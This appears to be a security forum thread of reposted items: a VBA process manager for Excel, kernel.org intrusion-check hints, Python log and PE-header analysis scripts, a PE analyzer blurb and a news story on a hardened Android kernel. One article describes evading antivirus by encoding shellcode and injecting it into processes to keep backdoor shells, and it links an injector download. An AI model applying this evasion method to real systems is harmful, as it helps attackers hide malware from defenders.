Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long
#End If

Private dicDevices As Dictionary

Private Function StartsWith(ByVal strValue As String, ByVal strStartingValue As String) As Boolean
    StartsWith = Left(strValue, Len(strStartingValue)) = strStartingValue
End Function

Private Function EndsWith(ByVal strValue As String, ByVal strEndingValue As String) As Boolean
    EndsWith = Right(strValue, Len(strEndingValue)) = strEndingValue
End Function

Private Function GetProcessOwner(ByVal lProcessID As Long) As String
#If Win64 Then
    Dim hProcess As LongPtr
    Dim hToken As LongPtr
#Else
    Dim hProcess As Long
    Dim hToken As Long
#End If
    Dim lAccountName As
Long Dim lDomainName As Long Dim peUse As Long Dim lNeeded As Long Dim abBuffer() As Byte Dim lpSid As Long Dim lpString As Long Dim strAccountName As String Dim strDomainName As String GetProcessOwner = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If OpenProcessToken(hProcess, TOKEN_QUERY, hToken) <> 0 Then GetTokenInformation hToken, TokenUser, 0, 0, lNeeded ReDim abBuffer(0 To CLng(lNeeded)) If GetTokenInformation(hToken, TokenUser, abBuffer(0), UBound(abBuffer), lNeeded) = 1 Then CopyMemory lpSid, abBuffer(0), 4 strAccountName = Space(MAX_PATH) strDomainName = Space(MAX_PATH) lAccountName = MAX_PATH lDomainName = MAX_PATH If LookupAccountSid(vbNullString, lpSid, strAccountName, lAccountName, strDomainName, lDomainName, peUse) <> 0 Then If strDomainName = "" Then GetProcessOwner = Left(strAccountName, CLng(lAccountName)) Else GetProcessOwner = Left(strDomainName, CLng(lDomainName)) & "\" & Left(strAccountName, CLng(lAccountName)) End If End If End If Call CloseHandle(hToken) End If CloseHandle hProcess End If End Function Private Function GetTimes(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim sFTCreation As FILETIME Dim sFTDummy As FILETIME Dim sFTCreationLocal As FILETIME Dim sSTCreation As SYSTEMTIME GetTimes = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If GetProcessTimes(hProcess, sFTCreation, sFTDummy, sFTDummy, sFTDummy) <> 0 Then If FileTimeToLocalFileTime(sFTCreation, sFTCreationLocal) <> 0 Then If FileTimeToSystemTime(sFTCreationLocal, sSTCreation) <> 0 Then GetTimes = CStr(sSTCreation.wYear) + "/" + CStr(sSTCreation.wMonth) + "/" + CStr(sSTCreation.wDay) + " " + CStr(sSTCreation.wHour) + ":" + CStr(sSTCreation.wMinute) + ":" + CStr(sSTCreation.wSecond) End If End If End If CloseHandle hProcess End If End Function Private Function GetType(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr 
#Else Dim hProcess As Long #End If Dim lWoW64 As Long Dim sSI As SYSTEM_INFO GetType = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If IsWow64Process(hProcess, lWoW64) Then GetNativeSystemInfo sSI GetType = IIf(sSI.wProcessorArchitecture > 0 And lWoW64 = 0, "64", "32") End If CloseHandle hProcess End If End Function Private Function Device2DriveFilename(ByVal strFilename As String) As String Dim varKeyDevice As Variant Device2DriveFilename = strFilename For Each varKeyDevice In dicDevices.Keys If StartsWith(strFilename, varKeyDevice) Then Device2DriveFilename = dicDevices(varKeyDevice) & Mid(strFilename, Len(varKeyDevice) + 1) End If Next End Function Private Function GetProcessFilename(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If Dim lLength As Long Dim strBuffer As String GetProcessFilename = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or PROCESS_VM_READ, 0, lProcessID) If hProcess <> 0 Then strBuffer = Space(MAX_PATH) Err.Clear On Error Resume Next lLength = GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) If Err.Number = 453 Then lLength = K32GetProcessImageFileName(hProcess, strBuffer, Len(strBuffer)) End If On Error GoTo 0 GetProcessFilename = Device2DriveFilename(Left(strBuffer, CLng(lLength))) CloseHandle hProcess End If End Function Private Function GetDevices() As Dictionary Dim intIter As Integer Dim strBuffer As String Dim lLength As Long Dim dicDevices As Dictionary Set dicDevices = New Dictionary Set GetDevices = dicDevices For intIter = Asc("A") To Asc("Z") strBuffer = Space(MAX_PATH) lLength = QueryDosDevice(Chr(intIter) & ":", strBuffer, Len(strBuffer)) If lLength > 0 Then dicDevices.Add Left(strBuffer, InStr(strBuffer, vbNullChar) - 1), Chr(intIter) & ":" End If Next End Function Private Sub ProcessListToSheet(oCell) #If Win64 Then Dim hSnapshot As LongPtr #Else Dim hSnapshot As Long #End If Dim lRet As Long Dim sPE32 As 
PROCESSENTRY32 Dim strProcess As String Dim iIter As Integer Dim iColumn As Integer Dim iPositionNull As Integer AdjustTokenForDebug hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sPE32.dwSize = Len(sPE32) lRet = Process32First(hSnapshot, sPE32) iIter = oCell.Row iColumn = oCell.Column Do While lRet iPositionNull = InStr(1, sPE32.szExeFile, Chr(0)) If iPositionNull > 0 Then strProcess = Left(sPE32.szExeFile, iPositionNull - 1) Else strProcess = "" End If Cells(iIter, iColumn).Value = strProcess Cells(iIter, iColumn + 1).Value = sPE32.th32ProcessID Cells(iIter, iColumn + 2).Value = GetProcessFilename(sPE32.th32ProcessID) Cells(iIter, iColumn + 3).Value = GetProcessOwner(sPE32.th32ProcessID) Cells(iIter, iColumn + 4).Value = GetTimes(sPE32.th32ProcessID) Cells(iIter, iColumn + 5).Value = GetType(sPE32.th32ProcessID) iIter = iIter + 1 lRet = Process32Next(hSnapshot, sPE32) Loop CloseHandle hSnapshot End If End Sub Private Sub SuspendProcessByID(ByVal lProcessID As Long, ByVal bSuspend As Boolean) #If Win64 Then Dim hSnapshot As LongPtr Dim hThread As LongPtr #Else Dim hSnapshot As Long Dim hThread As Long #End If Dim lRet As Long Dim sTE32 As THREADENTRY32 hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0&) If hSnapshot <> INVALID_HANDLE_VALUE Then sTE32.dwSize = Len(sTE32) lRet = Thread32First(hSnapshot, sTE32) Do While lRet If sTE32.rh32OwnerProcessID = lProcessID Then hThread = OpenThread(THREAD_SUSPEND_RESUME, False, sTE32.th32ThreadID) If hThread <> 0 Then If bSuspend Then SuspendThread hThread Else ResumeThread hThread End If CloseHandle hThread End If End If lRet = Thread32Next(hSnapshot, sTE32) Loop CloseHandle hSnapshot End If End Sub Private Sub TerminateProcessByID(ByVal lProcessID As Long) #If Win64 Then Dim hProcess As LongPtr #Else Dim hProcess As Long #End If hProcess = OpenProcess(PROCESS_TERMINATE, 0, lProcessID) If hProcess <> 0 Then TerminateProcess hProcess, 0 CloseHandle hProcess End 
If End Sub Private Sub ExecuteCommands(oCell) Dim iIter As Integer Dim iColumn As Integer AdjustTokenForDebug iIter = oCell.Row iColumn = oCell.Column Do While Cells(iIter, iColumn + 1).Value <> "" Select Case LCase(Cells(iIter, iColumn).Value) Case "t": TerminateProcessByID Cells(iIter, iColumn + 2).Value Case "s": SuspendProcessByID Cells(iIter, iColumn + 2).Value, True Case "r": SuspendProcessByID Cells(iIter, iColumn + 2).Value, False End Select iIter = iIter + 1 Loop End Sub Private Sub AdjustTokenForDebug() #If Win64 Then Dim hToken As LongPtr #Else Dim hToken As Long #End If Dim sTP As TOKEN_PRIVILEGES If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) <> 0 Then If LookupPrivilegeValue("", "SeDebugPrivilege", sTP.LuidUDT) <> 0 Then sTP.PrivilegeCount = 1 sTP.Attributes = SE_PRIVILEGE_ENABLED If AdjustTokenPrivileges(hToken, False, sTP, 0, ByVal 0&, ByVal 0&) <> 0 Then End If End If CloseHandle hToken End If End Sub Sub MacroProcessList() Range("A7:G65000").ClearContents Set dicDevices = GetDevices() ProcessListToSheet Range("B7") Range("A6:G65000").Sort "Process executable", xlAscending, header:=xlYes End Sub Sub MacroExecuteCommands() ExecuteCommands Range("A7") End Sub Sursa: http://blog.didierstevens.com/2011/10/15/taskmanager-runs-on-64-bit-excel/
-
kernel.org status: hints on how to check your machine for intrusion

From: Greg KH <greg-AT-kroah.com>
To: Linux Kernel Mailing List <linux-kernel-AT-vger.kernel.org>
Subject: kernel.org status: hints on how to check your machine for intrusion

The compromise of kernel.org and related machines has made it clear that some developers, at least, have had their systems penetrated. As we seek to secure our infrastructure, it is imperative that nobody falls victim to the belief that it cannot happen to them. We all need to check our systems for intrusions. Here are some helpful hints as proposed by a number of developers on how to check to see if your Linux machine might be infected with something:

0. One way to be sure that your system is not compromised is to simply do a clean install; we can all benefit from a new start sometimes. Before reinstalling any systems, though, consider following the steps below to learn if your system has been hit or not.

1. Install the chkrootkit package from your distro repository and see if it reports anything. If your distro doesn't have the chkrootkit package, download it from:
http://www.chkrootkit.org/
Another tool is the ossec-rootcheck tool which can be found at:
http://www.ossec.net/main/rootcheck
And another one is the rkhunter program:
http://www.rootkit.nl/projects/rootkit_hunter.html
[Note, this tool has the tendency to give false-positives on some Debian boxes, please read /usr/share/doc/rkhunter/README.Debian.gz if you run this on a Debian machine]

2. Verify that your package signatures match what your package manager thinks they are. To do this on a rpm-based system, run the following command:
rpm --verify --all
Please read the rpm man page for information on how to interpret the output of this command.
To do this on a Debian based system, run the following bash snippet:
dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n; fi; done > ~/tmp.txt
for f in `cat ~/tmp.txt`; do debsums -s -a $f; done
If you have a source-based system (Gentoo, LFS, etc.) you presumably know what you are doing already.

3. Verify that your packages are really signed with the distro's keys. Here's a bash snippet that can do this on a rpm based system to verify that the packages are signed with any key, not necessarily your distro's key. That exercise is left for the reader:
for package in `rpm -qa`; do
    sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package`
    if [ -z "$sig" ] ; then
        # check if there is a GPG key, not a PGP one
        sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package`
        if [ -z "$sig" ] ; then
            echo "$package does not have a signature!!!"
        fi
    fi
done
Unfortunately there is no known way of verifying this on Debian-based systems.

4. To replace a package that you find suspect, uninstall it and install it anew from your distro. For example, if you want to reinstall the ssh daemon, you would do:
$ /etc/init.d/sshd stop
rpm -e openssh
zypper install openssh    # for openSUSE based systems
yum install openssh       # for Fedora based systems
Ideally do this from a live cdrom boot, using the 'rpm --root' option to point rpm at the correct location.

5. From a liveCD environment, look for traces such as:
a. Rogue startup scripts in /etc/rc*.d and equivalent directories.
b. Strange directories in /usr/share that do not belong to a package. This can be checked on an rpm system with the following bash snippet:
for file in `find /usr/share/`; do
    package=`rpm -qf -- ${file} | grep "is not owned"`
    if [ -n "$package" ] ; then
        echo "weird file ${file}, please check this out"
    fi
done

6. Look for mysterious log messages, such as:
a. Unexpected logins in wtmp and /var/log/secure*, quite possibly from legitimate users from unexpected hosts.
b. Any program trying to touch /dev/mem.
c. References to strange (non-text) ssh version strings in /var/log/secure*. These do not necessarily indicate *successful* breakins, but they indicate *attempted* breakins which means your system or IP address has been targeted.

7. If any of the above steps show possible signs of compromise, you should investigate further and identify the actual cause. If it becomes clear that the system has indeed been compromised, you should certainly reinstall the system from the beginning, and change your credentials on all machines that this machine would have had access to, or which you connected to through this machine. You will need to check your other systems carefully, and you should almost certainly notify the administrators of other systems to which you have access.

Finally, please note that these hints are not guaranteed to turn up signs of a compromised system. There are a lot of attackers out there; some of them are rather more sophisticated than others. You should always be on the alert for any sort of unexpected behavior from the systems you work with.

thanks,

greg k-h

Source: kernel.org status: hints on how to check your machine for intrusion [LWN.net]
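Step 6 of the mail names two log indicators but leaves the reading to the admin. The script below is an added illustration of that check and is not part of Greg KH's mail: it walks /var/log/secure-style sshd lines and reports (a) accepted logins for a user from a host outside the set that user normally comes from and (c) "Bad protocol version identification" entries whose identification string is not plain text. The log lines and the per-user host allowlist (EXPECTED_HOSTS) are constructed for the example; a real run would feed it the actual log and its own inventory.

```python
"""Scan sshd entries from /var/log/secure-style logs for the two indicators
in step 6 of the note above: accepted logins from hosts a user is not
expected to come from, and non-text protocol version strings sent to sshd.
Added illustration, not part of Greg KH's mail; the log lines and the
per-user host allowlist are constructed for the example.
"""
import re

# Assumption for the example: where each account normally logs in from.
# A real deployment would load this from its own inventory.
EXPECTED_HOSTS = {
    "alice": {"10.0.0.5", "10.0.0.6"},
    "bob": {"192.168.1.20"},
}

ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<host>\S+) port \d+"
)
BAD_VERSION_RE = re.compile(
    r"sshd\[\d+\]: Bad protocol version identification '(?P<ident>.*)' from (?P<host>\S+)"
)
# syslog/sshd render control bytes as \xNN, \NNN, \M-x, \M^x or ^X; any of
# these means the peer sent something that was not a text version string.
ESCAPED_CTRL_RE = re.compile(r"\\x[0-9a-fA-F]{2}|\\[0-7]{3}|\\M[-^].|\^[A-Z@\[\\\]^_?]")


def is_text_version(ident: str) -> bool:
    """True only if the identification string is plain printable ASCII."""
    if any(not 0x20 <= ord(c) < 0x7F for c in ident):
        return False
    return ESCAPED_CTRL_RE.search(ident) is None


def scan(lines):
    """Return (indicator, subject, host) tuples for lines worth a closer look."""
    findings = []
    for line in lines:
        m = ACCEPTED_RE.search(line)
        if m:
            user, host = m.group("user"), m.group("host")
            if host not in EXPECTED_HOSTS.get(user, set()):
                findings.append(("login from unexpected host", user, host))
            continue
        m = BAD_VERSION_RE.search(line)
        if m and not is_text_version(m.group("ident")):
            findings.append(("non-text ssh version string", m.group("ident"), m.group("host")))
    return findings


# Constructed sample: a normal login, alice from an unknown address, an HTTP
# scanner hitting port 22 (text, so not flagged) and a client sending raw
# bytes, rendered the way syslog escapes them.
SAMPLE_LOG = """\
Oct 13 08:01:02 devbox sshd[2102]: Accepted publickey for alice from 10.0.0.5 port 51234 ssh2
Oct 13 08:07:45 devbox sshd[2140]: Accepted password for alice from 203.0.113.77 port 40022 ssh2
Oct 13 09:15:10 devbox sshd[2301]: Bad protocol version identification 'GET / HTTP/1.1' from 198.51.100.9
Oct 13 09:15:11 devbox sshd[2302]: Bad protocol version identification '\\x16\\x03\\x01\\x00\\xc8' from 198.51.100.9
Oct 13 10:02:33 devbox sshd[2410]: Accepted publickey for bob from 192.168.1.20 port 55010 ssh2
"""

if __name__ == "__main__":
    for indicator, subject, host in scan(SAMPLE_LOG.splitlines()):
        print("%-28s %-24s %s" % (indicator, subject, host))
```

The HTTP line is deliberately left unflagged: it is text, so under the mail's own criterion it is noise from a web scanner, while the `\x16\x03\x01` line (a TLS ClientHello sent to sshd) is the kind of non-text identification the mail means. Run it against a real log with `scan(open("/var/log/secure").read().splitlines())`.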
-
Bypassing Anti-virus using Code Injection Technique

Author: Amit Malik aka DouBle_Zer0

Contents
Introduction
Antivirus
Executables
PEview
Encrypter/packer/protector
The Concept of Injector
Video Demonstration
Download Injector
References

Introduction

This article throws light on how the 'Code Injection' or 'DLL Injection' technique can be used as a prominent weapon along with other techniques to bypass Anti-virus software. It also explains top-level technical details revolving around EXE internals, protectors/packers, encoded shellcodes, the inner working of Antivirus etc. Accompanying this article, you will find a video demonstration of 'Injector (POC Tool)' which shows the code injection technique successfully bypassing Antivirus software on the system.

Antivirus

Antivirus (or anti-virus) Software is used to prevent, detect, and remove malware, including computer viruses, worms, and Trojan horses. Such programs may also prevent and remove adware, spyware, and other forms of malware. @ Wikipedia

Antivirus plays a major role in the security of a system. But for hackers/pentesters, it creates some big problems. During the post-exploitation phase we have some sort of access on the victim machine and generally we want to upload some tools on the victim machine for better control, but here antivirus plays with our tools, detects them as malicious files and deletes them. Now it may be possible that if you are using your own tool then antivirus may fail to detect it, but this is a rare situation during a pentest. If we use publicly exposed tools then there is a higher probability of getting caught by antivirus.

A simple example: Suppose we have a reverse shell. Now we know that this is a single connection to our machine from our victim and we don't want to lose it under any condition. So we upload some tools on the victim machine like netcat or another executable (maybe generated from metasploit) to get a backup connection etc., maybe to upgrade our shell to a meterpreter shell. But our victim is using an antivirus and the antivirus deletes the uploaded files. Now we need something else, meaning either bypass AV or write our own code. But the question here is how antivirus is able to detect our executables (.exe).

Executables (.EXE)

Basically exe files not only contain your code but also contain some important data that is only meaningful for the Operating System loader. And the technical name for that data is the PE (portable executable) file header / PE file format. I am not explaining the PE file format here. Here is the snapshot, PEview - PE File Viewer Tool. So when we execute an exe, the windows loader first reads the PE header and on the basis of the header information the loader loads the file into memory.

Executable Detection (top level view): So when we copy the file onto the system then antivirus scans the file (checks for known signatures) and if the file is malicious then deletes the file.

Encrypter/packer/protector

The above technologies (Encrypter/packer/protector) are not only for evading anti viruses. People also use them for ethical work. Basically encryptors/packers encrypt/pack the file and add the decryption/unpacking routine into the file. So when we execute the file the windows loader loads the file on the basis of the PE header (an encryptor/packer does not pack the PE header of a file, it only changes the necessary values in the PE header, e.g. Address of entry point, sections etc.). So the unpacking works something like this: the unpacking/decryption routine unpacks the code and then jumps to the Original Entry Point (to our real code freshly recovered by the unpacking routine). So if we pack the exe with any packer then Antivirus should not be able to detect the exe? Ok, now it's time to do some practical work. Pack any malicious file with UPX (a freeware packer) and then test again with Antivirus. You should see that your AV is again popping up the alert and telling you: hey, don't try to fool me, it is malicious..

But our file was packed; how does AV still know that it is a malicious file? The answer is that AV also has a signature for UPX, so what AV is doing is: it loads the file, detects the packer, then decrypts/unpacks the file (AV also knows how to unpack UPX packed files) and then tests the file. And this is the reason that AV still knows that the file is malicious. But hey, where is the proof that AV is doing all this to test the file? Ok, to prove it just open the same packed file in a hex editor and overwrite the starting bytes with some garbage values and then test it again with your AV. Now you should see that AV is saying that the file is clean (Reason: because the file is corrupted and AV has no option to unpack/decrypt it). Fantastic, that's all we want.

Concept of Code Injection - a generic way to bypass AV

Because exe files are going to be detected by AVs (at least if you pack them with the publicly exposed packers/encryptors), we have to think in another way. And the other way is: split the exe into two parts (not physically):
The core code (the actual code that performs a specific task, e.g. a bind shell)
The interface - a mechanism that will inject the code into memory and execute that code.

So the functioning is something like this: Note that from the above explanation we know that shellcode/code in a file is not going to be detected by AV because AV doesn't know how to decode shellcode. (Don't talk about heuristics, I know AV vendors are joking.)

Important Note: you may be thinking why I am saying encoded shellcode: because if you use metasploit shellcodes, their signatures may be in AVs. If you encode the shellcode with any available encoder in metasploit then AVs are not able to decode it in a file and not able to detect it (if you don't understand it, read the whole thing again). Although in some cases (e.g. Avast, maybe others too) AV does not alert if you use shellcodes that are not encoded, because AV thinks that txt files are lame files. But if you forcefully scan the file then AV alerts.

The second part of the concept is the interface that will inject the code into a process. Code injection is not a new concept (dll injection is one of the most popular examples).

Note: All the things are generic and are not specific to any tool or shellcodes. Metasploit and shellcodes are used only to demonstrate the concept. You can also inject your codes "that are detectable to AV in exe mode" with this method and can bypass AV.

Things that you can do with this method:
Can backdoor a process
Can provide many backup shells (every type)
We can use publicly available (malicious) tools without fear, and too many other things limited to your wild imagination.

Download Injector

You can click on the link below to download the source code and executable for the Injector - Proof of Concept code.
http://securityxploded.net/download/Injector.rar

Source and video demo: Bypassing Anti-virus using Code Injection Technique | www.SecurityXploded.com
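The article's argument rests on what the loader, and therefore an AV's unpacker, reads from the PE header before any code runs: e_lfanew, the COFF and optional headers, the entry point and the section table, which a packer rewrites rather than hides. The walker below is an added example of that reading and is not code from Amit Malik's article or from the Injector tool. The two images it parses are constructed in memory (a plain .text/.data layout and a UPX-style UPX0/UPX1/.rsrc layout), not real binaries, and the packer indicators it reports (UPX section names, an executable section with no file data that is filled at run time, an entry point outside the first executable section) are the usual analyst heuristics, assumed here, not any vendor's signatures. It also shows the corruption experiment from the text: with the MZ bytes overwritten there is nothing left to parse.

```python
"""Minimal PE header walker: the fields a loader (or an AV unpacker) reads
before any code runs, plus the common packer heuristics an analyst applies
to them. Added illustration, not code from the article or the Injector
tool; the sample images are constructed in memory and the heuristics are
assumptions, not an AV vendor's signatures.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data: bytes) -> dict:
    """Parse DOS stub, COFF header, optional header and section table; ValueError if corrupt."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature: nothing for a loader or unpacker to work with")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]       # AddressOfEntryPoint (RVA)
    if magic == 0x10B:                                          # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                        # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections, off = [], opt + opt_size
    for _ in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(SECTION_FMT, data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "exec": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
        off += 40
    entry_section = None
    for s in sections:   # the section the first instruction executes from
        if s["va"] <= entry < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
            break
    return {"machine": machine, "magic": magic, "entry": entry, "image_base": image_base,
            "sections": sections, "entry_section": entry_section}


def packer_indicators(pe: dict) -> list:
    """Heuristics (assumed for the example) that the section layout was produced by a packer."""
    out, secs = [], pe["sections"]
    if any(s["name"].upper().startswith("UPX") for s in secs):
        out.append("UPX* section names")
    for s in secs:   # unpacking destination: executable, no bytes on disk, large in memory
        if s["exec"] and s["rawsize"] == 0 and s["vsize"] >= 0x1000:
            out.append("executable section %s has no file data (filled at run time)" % s["name"])
    exec_names = [s["name"] for s in secs if s["exec"]]
    if exec_names and pe["entry_section"] != exec_names[0]:
        out.append("entry point in %s, not the first executable section %s"
                   % (pe["entry_section"], exec_names[0]))
    return out


def build_sample(packed: bool) -> bytes:
    """Construct a tiny PE32 image: a plain .text/.data layout or a UPX-style one."""
    if packed:
        specs = [(b"UPX0", 0x8000, 0x1000, 0, 0x400, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
                 (b"UPX1", 0x2000, 0x9000, 0x200, 0x400, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
                 (b".rsrc", 0x1000, 0xB000, 0x200, 0x600, 0)]
        entry = 0x9F40                      # the unpacking stub near the end of UPX1
    else:
        specs = [(b".text", 0x1000, 0x1000, 0x200, 0x400, IMAGE_SCN_MEM_EXECUTE),
                 (b".data", 0x1000, 0x2000, 0x200, 0x600, IMAGE_SCN_MEM_WRITE)]
        entry = 0x1200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, entry)
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)                     # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                      # FileAlignment
    struct.pack_into("<I", opt, 60, 0x400)                      # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    table = b"".join(struct.pack(SECTION_FMT, n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in specs)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(0x400, b"\0")
    return headers + b"\0" * 0x400          # raw section data, zero-filled for the example


if __name__ == "__main__":
    for label, img in (("plain", build_sample(False)), ("upx-style", build_sample(True))):
        pe = parse_pe(img)
        print(label, "entry 0x%x in %s" % (pe["entry"], pe["entry_section"]), packer_indicators(pe))
    try:
        parse_pe(b"\0\0" + build_sample(True)[2:])   # the hex-editor experiment from the text
    except ValueError as err:
        print("garbage over the header:", err)
```

Point `parse_pe(open(path, "rb").read())` at a real file to see the same fields PEview shows; the corruption case is the practical caveat: a file whose first bytes are garbage is unparseable for the AV's unpacker, but it is equally unparseable for the Windows loader, so the "clean" verdict in the text is obtained on a file that no longer runs.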
-
NPE File Analyzer

View and Edit 32bit and 64bit Portable Executable (PE) Files

NPE File Analyzer is a utility that allows users to view and edit 32bit and 64bit Portable Executable (PE) files, such as .EXE, .DLL and .SYS files. NPE provides functions for inspection of unknown binaries: you can analyze sections, resources, import and export tables, relocations, the TLS table, and much more. It has a built-in process manager to analyze running processes and loaded modules. It is possible to fix a dumped file, realign a file, extract PE(s) from a file, add a code cave and compare PE files to check for differences in the PE structure. NPE can also generate the MD5 hash, SHA1 hash and CRC32 hash of a file. It has full support for PEiD plugins and it also has a built-in hex editor that allows you to edit a file.

Features
Add and Find Code Caves
Add to Explorer Context Menu
ASCII and UNICODE Strings Viewer
Bound Import Viewer
Change Icon (only 32-bit PEs supported)
Compare PE Files
Delay Import Viewer
Edit 32bit and 64bit portable executables
Export and Import Viewer
Extract Portable Executable Files
File Hasher (MD5, SHA1, CRC32)
File Location Calculator
Full PEiD Plugin Compatibility
Hex Editor
Load Config Viewer
PE Editor
PE Section Viewer
Processes and Modules Manager
Remove Base Relocations
Resource Viewer
TimeDateStamp Adjuster
TLS Editor

Download: http://downloads.novirusthanks.org/files/npe_setup.exe
Portable: http://downloads.novirusthanks.org/files/portables/npe_portable.zip

Source: NPE File Analyzer - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
-
Secure Android kernel could make for 'classified' smart phones

By Henry Kenyon
Oct 13, 2011

A research team from Google, George Mason University and the National Security Agency have developed a hardened kernel for the Android 3.0 operating system that could solve the problem of using smart phones in military operations and emergency response.

The kernel, which is in the final stages of certification testing, opens the way for the Army to begin issuing smart phones or tablet-type wireless devices to troops in combat operations. The White House also is interested because the hardened kernel could help fulfill a government plan to create a secure national wireless network for first responders, Michael McCarthy, operations director of the Army's Brigade Modernization Command's Mission Command Complex, said at the AUSA Annual Meeting and Exposition in Washington on Oct. 10. McCarthy also heads the service's Connecting Soldiers to Digital Applications (CSDA) program, the lead organization involved in selecting handheld wireless technologies for military use.

One of the problems vexing Army smart phones has been getting the right security accreditation to operate on military networks and eventually on classified networks. This is particularly important to allow smart phones to connect into battlefield networks, McCarthy said. The initial goal is to get the hardware and software accredited. "We have to have a way to verify the identity of the user of the smart phone. So it's a triple-level security measure that we have to deal with," he said.

There were delays in getting the operating system accredited until NSA came forward several months ago and offered to expedite the approval process, McCarthy said. The new effort kicked off with a series of meetings with CSDA program personnel and representatives from NSA and the National Institute of Standards and Technology.

The Android kernel is now being tested for a Federal Information Processing Standard 140-2 certification, which is expected by mid-October. "That's the first level of security that we've got to get before we start moving onto being able to ultimately do secret [communications]," he said. After the testing is complete, it is just a matter of filling out the certification paperwork, McCarthy said. "That is a game-changer for the security business because it then sets the conditions so that in the second quarter [late March 2012] they can do the certification of the Secure Sockets Layer, which then gives us the ability to operate at the classified levels," he said.

In addition to the Army's plans to provide troops with smart phones, the Obama administration was attracted to the technology to support two of its initiatives. One is an effort by the White House Communications Office to move the executive branch from BlackBerry devices to Android-based phones. The reason is that Android devices with the new kernel can be secured at a higher clearance level than BlackBerry devices, McCarthy said.

In June 2011, NSA approached McCarthy about working on the problem. The White House interest came from the Office of Science and Technology Policy, run by federal CTO Aneesh Chopra. "They had apparently been tracking the CSDA project on the Internet for several months, and they wanted me to come and give them a briefing," he said. McCarthy thought he was going to brief White House staffers, but instead he presented to Chopra, his deputy, and senior representatives from the Justice Department and the FBI.

The other, wider government interest tied into an ongoing White House initiative to create a secure, wireless national public safety infrastructure. The infrastructure would combine all of the nation's public safety organizations into a secure wireless system, moving first responders away from radio-based systems. "It is potentially a multi-billion dollar effort," he said.

Justice is the lead civilian agency working on the White House effort. There, the FBI and its scientists are responsible for developing their version of CSDA. The FBI and Justice are also planning to conduct pilot projects, but on a larger scale than the Army, McCarthy said. One of the concerns behind the government's drive is that the radio communications networks used by federal, state and local response agencies are not very secure. This is a special concern for law enforcement and emergency response organizations' operational channels, which could be subject to interception, spoofing and jamming. "They're looking at replacing radio with a smart phone," he said.

Source: http://gcn.com/Articles/2011/10/11/AUSA-secure-andriod-kernel-technology.aspx
-
Heroes of the Computer Revolution by Steven Levy

Hackers: Heroes of the Computer Revolution (ISBN 0-385-19195-2) is a book by Steven Levy about hacker culture. It was published in 1984 in Garden City, New York by Anchor Press/Doubleday. Levy describes the people, the machines, and the events that defined the Hacker Culture and the Hacker Ethic, from the early mainframe hackers at MIT, to the self-made hardware hackers and game hackers. Immediately following is a brief overview of the issues and ideas that are brought forward by Steven Levy's book, as well as a more detailed interpretation of each chapter of the book, mentioning some of the principal characters and events. The book saw an edition with a new afterword (entitled "Afterword: Ten Years After") by the author in 1994.[1] In 2010, a 25th anniversary edition with updated material was published by O'Reilly.[2]

Download: http://www.dvara.net/HK/LevyStevenHackers1&2.pdf
